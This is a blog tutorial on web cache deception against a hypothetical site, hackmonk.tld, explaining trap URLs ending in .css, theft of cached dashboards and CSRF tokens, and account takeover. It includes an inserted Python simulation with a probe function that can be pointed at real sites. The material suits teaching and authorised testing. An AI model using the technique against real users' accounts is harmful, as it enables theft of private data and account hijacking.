Wednesday, 16 January 2019

A Noob's Guide to Web Cache Deception.

Users are often the weakest link when we are hunting for a vulnerability, and of course they can be easily tricked. In this tutorial we are going to discuss a simple but severe bug known as Web Cache Deception. So let's begin.

As the name says it all, "Web Cache Deception" is something related to a cache and the act of deceiving someone: the attacker deceives both the victim and the cache, using a weakness in how the caching layer decides what to store. So, how does it work? As a rough definition: a caching layer (a CDN, a reverse proxy, or a load balancer / web application firewall with caching enabled) sits in front of the web server. When a page it considers cacheable is requested, it stores a copy, and the next time the same URL is requested the copy is served from the cache and not from the server. An attacker crafts a malicious link (we will talk about this further) and the victim, who is logged in, clicks on it. The victim's private response gets cached under that URL, and the attacker can then request the same URL and receive the victim's sensitive data from the cache. Now let's break it down and understand everything step by step.

Caching Mechanism

Caching is simply storing a copy of a response so that it can be served again without going back to the origin server. This is usually done for content that is requested frequently, to reduce load on the server and latency for users.
Note: static files, i.e. those with extensions like .css, .txt, .jpg, .png, .js etc., are cached more often because such files normally don't contain any sensitive or user-specific information. Many caches decide what to cache purely from the file extension at the end of the URL, and that assumption is exactly what this attack abuses.

Malicious Link
Now let us assume that there is a web application "hackmonk.tld" with a caching mechanism in front of it that caches all public static files. Let us also assume that the web application has a user account feature, and every user, after authentication, can access their dashboard via "hackmonk.tld/home".

What an attacker will do is modify the URL to make it "hackmonk.tld/home/non-existing-file.css", where "non-existing-file.css" is a file name that does not exist, with a .css extension. This is the malicious link. But hey, won't this give a 404 Not Found status code? That is exactly the check: if the server ignores the extra path segment and "hackmonk.tld/home/non-existing-file.css" returns the content of "hackmonk.tld/home" with a 200, the vulnerability may exist and we can go for further testing. Also look at the response headers: if the dashboard is served without Cache-Control: no-store or private, or the cache is known to ignore those directives for static extensions, the second condition is met too.

So the attacker sends the URL "hackmonk.tld/home/non-existing-file.css" to the victim and somehow gets them to open it in a browser in which they are logged in to "hackmonk.tld". The victim sees their dashboard, and the caching mechanism, thinking the URL belongs to a public static file because it ends in .css, caches the response, which is the victim's dashboard. The attacker then requests the same URL (before the cached copy expires, and through the same cache node the victim hit), and it is served from the caching mechanism instead of the server. BOOM, private information is in your hands. Sometimes the cached page will also contain the victim's anti-CSRF token; with it the attacker can forge state-changing requests on the victim's behalf (for example changing the account e-mail or password), which can lead to full ACCOUNT TAKEOVER. Isn't it cool?

Here is an image that demonstrates the whole attack scenario:

Now let's discuss it further with some questions.

Won't it ask for authentication when accessing the cached page?
No, it won't. The cache serves its stored copy to anyone who requests that URL without consulting the web server, so the application's session check never runs. Websites don't require authentication for public static files, and most caches key entries on the URL alone and ignore cookies, which is why the victim's page is handed straight to the attacker.

What are the conditions for this attack to work?
Well, there should be a caching layer in front of the application (a CDN like Akamai or CloudFront, a reverse proxy, a load balancer or a WAF with caching enabled) which is of course not configured properly: it decides what to cache from the file extension in the URL and ignores the session cookie and the origin's caching headers. And when requesting a URL like "hackmonk.tld/home/non-existing-file.css", the server should give the content of "home" for that URL instead of a 404. Finally, the victim must be logged in when they open the link.
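To make the malicious-link flow and the conditions above concrete, here is an added example in Python (my own code, not code from the original post or from any real site). It simulates a hypothetical hackmonk.tld origin that routes anything under /home/ to the dashboard, a cache that keys on the path only and stores anything ending in a static extension, the two-step attack (victim click, then attacker fetch), and a probe() that automates the manual 404-versus-200 check. The session cookie values, the user "alice", the extension list and the X-Cache header are assumptions made for the simulation.

```python
"""Simulated web cache deception: origin + cache + attack + probe."""
import re
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional

# Constructed session table for the hypothetical site hackmonk.tld.
SESSIONS = {"sess-victim": "alice"}
# Extensions the cache treats as "public static file" (assumption).
STATIC_EXT = re.compile(r"\.(css|js|png|jpg|gif|ico|txt)$", re.IGNORECASE)


@dataclass
class Response:
    status: int
    body: str
    headers: Dict[str, str] = field(default_factory=dict)


def origin(path: str, cookie: Optional[str], route_loosely: bool, no_store: bool) -> Response:
    """Hypothetical hackmonk.tld origin. route_loosely=True reproduces the bug:
    any path under /home/ is served as the dashboard. no_store=True marks the
    dashboard Cache-Control: no-store so a well-behaved cache will not keep it."""
    is_dashboard = path == "/home" or (route_loosely and path.startswith("/home/"))
    if not is_dashboard:
        return Response(404, "not found")
    user = SESSIONS.get(cookie or "")
    if user is None:
        return Response(302, "redirect to /login", {"Location": "/login"})
    headers = {"Cache-Control": "no-store"} if no_store else {}
    return Response(200, f"<h1>Dashboard of {user}</h1><input name=csrf value=csrf-{user}>", headers)


class Cache:
    """Shared cache in front of the origin: keyed on the path only (cookies are
    ignored), stores any 200 whose URL ends in a static extension unless the
    origin says no-store. X-Cache tells the client whether it got a stored copy."""

    def __init__(self, route_loosely: bool = True, no_store: bool = False):
        self.store: Dict[str, Response] = {}
        self.route_loosely, self.no_store = route_loosely, no_store

    def get(self, path: str, cookie: Optional[str] = None) -> Response:
        if path in self.store:
            hit = self.store[path]
            return Response(hit.status, hit.body, {**hit.headers, "X-Cache": "HIT"})
        resp = origin(path, cookie, self.route_loosely, self.no_store)
        cacheable = resp.status == 200 and STATIC_EXT.search(path) is not None
        if cacheable and "no-store" not in resp.headers.get("Cache-Control", ""):
            self.store[path] = Response(resp.status, resp.body, dict(resp.headers))
        resp.headers["X-Cache"] = "MISS"
        return resp


def run_attack(route_loosely: bool = True, no_store: bool = False) -> Response:
    """Step 1: the logged-in victim opens the trap URL. Step 2: the attacker
    requests the same URL with no session. Returns what the attacker sees."""
    cache = Cache(route_loosely, no_store)
    trap = "/home/non-existing-file.css"
    cache.get(trap, cookie="sess-victim")
    return cache.get(trap, cookie=None)


def probe(fetch: Callable[[str, Optional[str]], Response], cookie: str,
          page: str = "/home", marker: str = "Dashboard") -> Dict[str, bool]:
    """The manual check from the post, automated. fetch(path, cookie) is any
    callable with Cache.get's signature (wrap requests/urllib for a real target
    you are authorised to test). A fresh random filename is used so an earlier
    probe cannot pollute the result."""
    trap = f"{page}/{secrets.token_hex(6)}.css"
    as_victim = fetch(trap, cookie)
    as_attacker = fetch(trap, None)
    cc = as_victim.headers.get("Cache-Control", "").lower()
    return {
        # trap URL answered with the private page instead of a 404
        "path_confusion": as_victim.status == 200 and marker in as_victim.body,
        # origin did not forbid caching (a misconfigured cache may ignore this anyway)
        "cache_allowed": not any(d in cc for d in ("no-store", "private")),
        # unauthenticated request got the private page back from the cache
        "leaked": as_attacker.status == 200 and marker in as_attacker.body,
    }


if __name__ == "__main__":
    for flags in [(True, False), (True, True), (False, False)]:
        r = run_attack(*flags)
        print(f"route_loosely={flags[0]!s:5} no_store={flags[1]!s:5} -> "
              f"{r.status} {r.headers['X-Cache']} {r.body!r}")
    print(probe(Cache().get, "sess-victim"))
```

With the default flags the attacker gets a cache HIT containing alice's dashboard and her CSRF token; fixing either condition (the origin returning 404 for /home/anything, or marking the dashboard no-store) stops the leak in this simulation. Two caveats for a real test: the attacker's request must arrive before the cached copy expires and must hit the same cache node (for a CDN, the same edge) the victim used; and some CDNs override the origin's Cache-Control for URLs that look like static files, which is why the robust fix is strict routing (404 on unknown sub-paths) rather than headers alone.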

Final Words
So here we end this tutorial, and I hope it explains everything about Web Cache Deception. Please comment down below if I missed anything or if I wrote something incorrect.

Resources and Tools 
Here are some resources for further reading on the topic "Web Cache Deception"
And here is a payload list for faster testing 

Thank you for reading, guys. I will meet you next time with more informational content. BYE

